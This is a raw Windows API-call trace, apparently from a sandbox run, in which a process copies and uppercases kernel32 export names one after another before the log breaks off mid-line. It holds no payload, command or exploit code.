[0084.091] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.091] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.091] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.091] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.091] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.091] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.091] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.091] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.091] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.091] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.091] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.091] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.091] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.091] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.091] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.091] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.091] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.091] lstrlenA (lpString="BEEP") returned 4 [0084.091] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.091] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.091] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.091] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.091] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.091] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.092] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.092] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.092] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.092] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.092] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.092] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.092] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.092] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.092] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.092] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.092] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.092] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.092] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.092] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.092] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.092] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.092] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.092] lstrlenA (lpString="CANCELIO") returned 8 [0084.092] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.092] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.092] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.092] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.092] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.092] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.092] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.092] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.092] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.092] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.092] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.092] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.092] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.092] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.092] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.092] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.092] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.092] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.092] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.092] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.093] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.093] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.093] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.093] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.093] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.093] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.093] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.093] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.093] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.093] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.093] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.093] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.093] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.093] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.093] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.093] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.093] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.093] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.093] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.093] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.093] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.093] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.093] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.093] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.093] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.093] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.093] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.093] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.093] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.093] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.093] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.093] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.093] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.093] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.093] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.093] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.093] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.093] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.094] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.094] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.094] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.094] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.094] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.094] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.094] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.094] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.094] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.094] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.094] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.094] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.094] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.094] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.094] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.094] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.094] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.094] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.094] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.094] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.094] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.094] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.094] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.094] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.094] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.094] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.094] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.094] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.094] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.094] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.094] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.094] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.094] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.094] lstrlenA (lpString="COPYFILEA") returned 9 [0084.094] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.094] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.094] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.094] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.095] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.095] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.095] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.095] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.095] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.095] lstrlenA (lpString="COPYFILEW") returned 9 [0084.095] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.095] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.095] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.095] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.095] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.095] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.095] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.095] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.095] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.095] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.095] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.095] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.095] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.095] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.095] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.095] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.095] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.095] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.095] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.095] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.095] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.095] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.095] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.095] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.095] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.095] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.095] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.095] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.095] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.095] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.095] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.095] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.096] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.096] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.096] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.096] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.096] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.096] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.096] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.096] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.096] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.096] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.096] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.096] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.096] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.096] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.096] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.096] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.096] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.096] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.096] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.096] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.096] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.096] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.096] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.096] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.096] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.097] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.097] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.097] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.097] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.097] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.097] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.097] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.097] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.097] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.097] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.097] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.097] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.097] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.097] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.097] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.097] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.097] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.097] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.097] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.097] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.097] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.097] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.097] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.097] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.097] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.097] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.097] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.097] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.097] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.097] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.097] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.097] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.097] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.097] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.097] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.097] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.097] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.098] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.098] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.098] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.098] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.098] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.098] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.098] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.098] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.098] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.098] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.098] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.098] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.098] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.098] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.098] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.098] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.098] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.098] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.098] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.098] lstrlenA 